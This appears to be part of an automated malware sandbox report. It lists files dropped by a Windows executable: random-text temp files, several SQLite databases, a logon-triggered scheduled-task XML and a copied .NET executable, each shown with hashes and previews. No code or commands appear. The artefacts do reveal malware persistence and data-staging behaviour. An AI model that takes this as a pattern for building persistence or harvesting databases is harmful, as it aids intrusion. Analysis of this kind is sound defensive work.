SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmpCD47.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\Temp\tmpCD48.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\tmpCD49.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmpCEC6.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE6F4.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE704.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE705.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE716.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE717.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE728.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE729.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE739.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE74A.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE74B.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.130155736755004
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtakxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTpv
MD5:	001D4FF55DAD5C3D15BA786B828DA66E
SHA1:	D988737767AA474D8499B993618963563FCCC980
SHA-256:	D2AE8F1531296B0C6871A1256186C5970B032A4989B65D4FF7238E8E326AF2FA
SHA-512:	742AC8E43EE6E531942805114FF4F4C77DBFB5CAC0913CED000AA87727365D7CD1C6FFF0C45CF92C07FA1DC2098D95907EFAE8ED13BF6ACC2566084E55838B1A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpF036.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF046.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF076.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF096.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	646144
Entropy (8bit):	7.669667331218024
Encrypted:	false
